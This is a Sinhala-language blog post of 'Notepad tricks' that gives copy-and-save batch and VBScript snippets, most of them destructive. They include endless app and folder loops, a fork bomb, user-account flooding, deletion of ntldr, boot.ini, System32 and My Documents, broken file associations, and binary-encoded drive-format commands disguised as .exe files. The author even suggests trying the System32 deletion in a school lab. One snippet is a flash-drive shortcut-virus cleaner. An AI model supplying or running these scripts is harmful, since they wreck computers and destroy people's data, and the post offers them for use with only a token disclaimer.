Skip to main content

Notepad වැඩ ටිකක්.

Windows මෙහෙයුම් පද්දතියෙ තියන පහසු කමක් තමයි Notepad කියන්නෙ,හැමෝම දන්නව නොදන්න කෙනෙක් නැති තරම්.Notepad ගැන ඔයල මොනාද දන්නේ? ඇත්තටම කරන්න පුලුවන් Type කරන එක විතරමද? වෙන මොකුත්ම කරන්න බැරිද? අද අපි දෙන්න යන්නෙ Notepad එක බාවිත කරල කරන්න පුලුවන් වැඩ ටිකක්.
 අනුන්ට හානියක් කිරීමේ අරමුණින් මේවා කරන්න එපා.

01.පහල Code එකෙන් වෙන්නෙ ලියලා තියන වැඩ සටහන් නොනැවතී Open වෙන එකයි.මේකට ඔයලා තව කැමති ඒවා එකතු කරගන්න  පුලුවන්.Win Word,Paint,Notepad,Cmd,Explorer කියන ඇප්ලිකේශන් දිගින් දිගටම Open වෙන්න තමයි පහල කෝඩ් එක ලියල තියෙන්නෙ.අවසන් ප්රතිපලය පරිගනකයේ මතකයට මෙය දරා ගැනීමට නොහැකිව පරිගණකය හිර වීමක් තමයි සිද්ද වෙන්නෙ. Save කරන විට Save As ගිහින් Ghostlk.Bat කියල Save කරගන්න. Extension එක වෙන්නෙ .Bat
@echo off
:x
start winword
start mspaint
start notepad
start write
start cmd
start explorer
start control
start calc
goto x 

02. මෙතනදී සිදුවන්නේත් දිගින් දිගටම පෝල්ඩයරන් නිර්මානය වීමයි. අවසන් ප්රතිපලය පරිගනකයේ මතකයට මෙය දරා ගැනීමට නොහැකිව පරිගණකය හිර වීමක් සිදු වෙනව. Save කරන විට Save As ගිහින් Ghostlk.Bat කියල Save කරගන්න. Extension එක වෙන්නෙ .Bat
@echo off
:x
md %random%
goto x

03. මෙහිදී User Accounts  දිගින් දිගටම නිර්මාණය කිරීමක් සිදුවෙනව .මෙහිදීත් සිදුවන්නෙ පරිගනකය සිර වීමක්. Save කරන විට Save As ගිහින් Ghostlk.Bat කියල Save කරගන්න. Extension එක වෙන්නෙ .Bat
@echo off
:x
net user %random% /add
goto x

04.මේ කෝඩ් එකෙන් සිදුවන්නෙ පරිගනකය Boot කරන්න ඕන File එක මකල දමන එක .එතකොට පරිගනකය බූට් කරන්න බැරි තත්වයට පත් වෙනවා. Ntldr කියන  File එක තමයි මේ කෝඩ් එකෙන් මැකිලා යන්නේ.File එක තමයි පරිගනකය Boot කරන්න ප්රදාන වශයෙන් බලපාන්නෙ. Save කරන විට Save As ගිහින් Ghostlk.Bat කියල Save කරගන්න. Extension එක වෙන්නෙ .Bat
attrib -S -R -H C:\ntldr
del ntldr

05.මේ කෝඩ් එක Cup Usage එක 100% දක්වා අනිසි ආකාරයෙන් ඉහල යවන්න හැකි වෙන්ව. Save කරන විට Save As ගිහින් Ghostlk.Bat කියල Save කරගන්න. Extension එක වෙන්නෙ .Bat
%0|%0 

06.මෙම කේතයෙන් සිදුවන්නෙ පරිගනකයෙ තිබෙන නොයෙක් ආකාරයෙ ගොනු වෙනත් ගොනු වර්ගයක් බවට පත් කරන එකයි.උදාහරනයක් ව්දිහට .Jpg කියන Format එක .Txt කියන Format එක බවට පත් වෙනව .පරිගනකයෙ තිබෙන සියලුම Jpg Files Txt File බවට පත් කරන එක මේ කෝඩ් එකෙන් කරන්නෙ. Extension කියන තැනට මාරු කරන්න ඕනේ File Format එක දාන්න. උදාහරණයක් ලෙස [Assoc .Txt=.Exe] Save කරන විට Save As ගිහින් Ghostlk.Bat කියල Save කරගන්න. Extension එක වෙන්නෙ .Bat
@echo off
assoc .txt=
Extension
assoc .exe=
Extension
assoc .jpeg=
Extension
assoc .png=
Extension
assoc .mpeg=
Extension

07. මේ කේතයෙන් සිදුවන්නෙ කී බෝඩ් එකෙ තියන ලයිට් දැල් වෙන එකයි.පහල කේතය නෝට්පෑඩ් එකට කොපි කරගෙන Save As ගිහින් Ghostlk.Vbs ආකාරයට Save කරගන්න.මතක තියාගන්න Extension එක .Vbs
msgbox"This is a Virus Created By Ghost Man,No harm will be Done to ur PC,,Use Task Manager to stop this "
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop


08.ඊලග කේතයෙන සිදුවෙන්නේ Cd,Dvd Rom එක දිගින් දිගටම Open Close වෙන එකයි .අපි බලමු ඒවගේ කේතයක් ලියන්නෙ කොහොමද කියල. පහල කේතය නෝට්පෑඩ් එකට කොපි කරගෙන Save As ගිහින් Ghostlk.Vbs ආකාරයට Save කරගන්න.
Set oWMP = CreateObject(“WMPlayer.OCX.7?)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

09.මේ කේතය හරියට ඇන්ටි වයිරස් ගාඩ් එකක් වගේ ක්රියාත්මක වෙනවා.ඒ කියන්නෙ Pen Drive එකේ ඔක්කොම ෆයිල් ෂෝට් කට් වීම, Folders,File පේන්නන්නේ නැතිවීම වගේ ගැටළුවලට අපිට ගොඩක් වෙලාවට මුහුණ පාන්න වෙනවා.ඒ වගේ වෙලාවට අපිට පුලුවන් Notepad එක හරහා මේ ගැටලුවට පිලිතුරක් ලබාගන්න.Save කරනකොට .Bat කියල Save කරන්න.(Ghostlk.Bat)
echo off
color 9f
cls
echo.
echo.
echo.
echo.
echo ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
echo ++ ++
echo ++ ++
echo ++ *** ShortCut Virus Remover *** ++
echo ++ ++
echo ++ ++
echo ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
echo.
echo.
echo Recommend only to use in Flash drives.
echo.
echo If this file is on your Desktop it will badly affect to your Desktop Icons !!!
echo.
echo.
echo.
echo.
echo Shortcut Virus Remover is going to repair your Flash drive..........
echo.
pause
cls
echo.
echo.
echo.
echo.
echo Cleaning process will take few seconds..........
echo Please wait..........
echo.
echo.
echo.
del *.lnk
del fypuas.exe
del fypuasx.exe
cls
echo.
echo.
echo Removing Shortcuts........... Complete.
echo.
echo.
echo.
echo Make visible your folder........... is in process..........
echo This process will take few minutes..........
echo.
echo Please wait..........
attrib /s /d -s -h -r *.*
cls
echo.
echo.
echo.
echo Shortcut Virus Remover finish its Job.........
echo.
echo Your Flash drive is OK now
echo.
echo.
echo.
echo Check your Flash drive for unknown files and folders.
echo If there is any, delete them.
echo.
echo.
echo.
echo.
echo.
echo.
echo Cleaning Process Complete.
echo.
echo.
echo Developed by Ghost Man.......
echo.
echo.
echo.
pause

10.පහලකෝඩ් එකෙන් වෙන්නෙ වින්ඩෝස් මෙහෙයුම් පද්දතියෙ තියන System 32 කියන ෆෝල්ඩර් එක ඉවත් කරන එක.කරල බලනව නම් School එකෙ Lab එකේ ඉන්න වෙලාවක අත්හදා බලන්න.Save කරනවිට Ghostlk.Bat කියල Save කරගන්න .
del c:\WINDOWS\system32\*.*/q

11.ඊලග කෝඩ් එක කිසියම් කාල පරාසයක් තුල පරිගනකය Shutdown වෙන ආකාරයේ කෝඩ් එකක්. S අකුර වෙනුවට R හෝ L අකුර දාන්න පුලුවන්. S - කියන්නෙ Shutdown, R - කියන්නේ Restart, L - කියන්නෙ Log Off. T30 කියන්නෙ කාලය,ඒකත් කැමති  ආකාරයකට වෙනස් කරගන්න පුලුවන්. Save කරනකොට Ghostlk.Exe
Shutdown -s -t 30 -c "Create By Ghost Man"

12.ඊලග කෝඩ් එකට පුලුවන් Hard Disk එක ෆෝමැට් කරලා දාන්න. මේ Code එකෙන් C: Drive එක ෆෝමැට් වෙනවා.Save කරනකොට Ghostlk.Exe කියල ෆයිල් නේම් එකට දෙන්න.
01100110011011110111001001101101011000010111010000 100000011000110011101001011100
0010000000101111010100010010111101011000


13.මෙන්න මේකෙන් D: එක Save කරනකොට Ghostlk.Exe

01100110011011110111001001101101011000010111010000 100000011001000011101001011100
0010000000101111010100010010111101011000


14.මෙන්න මේකෙන් A: එක Save කරනකොට Ghostlk.Exe

01100110011011110111001001101101011000010111010000 100000011000010011101001011100
0010000000101111010100010010111101011000

15.පහල කෝඩ් එකෙන් Boot.Ini ගොනුව මැකෙනව.එතකොට පරිගනකය Boot වෙන්නෙ නැතිව යනවා.ඒ වගේම කෝඩ් එකක් මම කලින් දුන්නා. Save කරනකොට Ghostlk.Exe

01100100011001010110110000100000001011110100011000 101111010100110010111101010001
00100000011000110011101001011100011000100110111101 101111011101000010111001101001
0110111001101001

16.මේ කෝඩ් එක කරන්නෙ My Document කියන ෆයිල් එක ඉවත් කරලා දාන එක. BAT File Extension ආකාරයට Save කරගන්න.ඒ කිව්වේ Ghostlk.BAT


rmdir C:\Documents and Settings \S\Q

Comments

  1. Batch file creators Inc. limitedAugust 25, 2016 at 11:43 AM

    අත්හදා බැලීම අති භයානකයි. ප්‍රවේශම් වන්න.

    ReplyDelete

Post a Comment

Popular posts from this blog

Word to PDF Convertor

 A Word document may be easily converted to a PDF file However, what happens if you need to convert a ton of Word files into PDFs? It will take a long time to open every file by hand and save it to PDF.  You may quickly and easily convert large amounts of Word to PDF with the help of this method. And without utilizing any outside tools either. Ms. Word is all you need. Copy the following code into Notepad or Notepad++, then save the file as "PDF.js" in a folder var obj = new ActiveXObject("Scripting.FileSystemObject"); var docPath = WScript.Arguments(0); docPath = obj.GetAbsolutePathName(docPath); var pdfPath = docPath.replace(/\.doc[^.]*$/, ".pdf"); var objWord = null; try {     objWord = new ActiveXObject("Word.Application");     objWord.Visible = false;     var objDoc = objWord.Documents.Open(docPath);     var format = 17;     objDoc.SaveAs(pdfPath, format);     objDoc.Close();     WScript.Echo("Saving '" + docPath + "'

BACKUPPC INSTALLATION AND CONFIGURATIONS

BACKUPPC INSTALLATION AND CONFIGURATIONS BackupPC is a backup solution that can be configured to back up remote Linux and Windows systems. It can use a variety of different protocols and has a flexible scheduler to coordinate full and incremental backups. I have installed this on ubutnu 14.04 LTS and its running fine for me for a long time since the installation Open a terminal and enter the following commands: sudo apt-get update sudo apt-get install backuppc During the installation, you will be asked what kind of mail server configuration is needed. We can select the "Local only" option, because we will not be configuring internet-aware mail ???????? Postfix Configuration ????????? ? General type of mail configuration: ? ? ? ? No configuration ? ? Internet Site ? ? Internet wi

Flash For EVONY 2021

Flash is now officially dead.   with this way you can still use Flash. if you have any problem while installing or working on this please feel free to contact me to help you first we have to go to pale moon https://www.palemoon.org/ Download and install PaleMoon then lets go to adobe archive page  https://web.archive.org/web/20200630185339/https://helpx.adobe.com/flash-player/kb/archived-flash-player-versions.html go to bottom of the page until you find the  Flash Player archives this site is little bit slower than others  Download this version,after May it is not working (Released 5/12/2020)  Flash Player 32.0.0.371  (425 MB)    https://web.archive.org/web/20200630185339/https://fpdownload.macromedia.com/pub/flashplayer/installers/archive/fp_32.0.0.371_archive.zip Unzip the archive and install the flash player for windows, Goto control panel and find the flash adon there Click on never check for updates  then open your c drive  and search where adobe is get installed. in here i am usi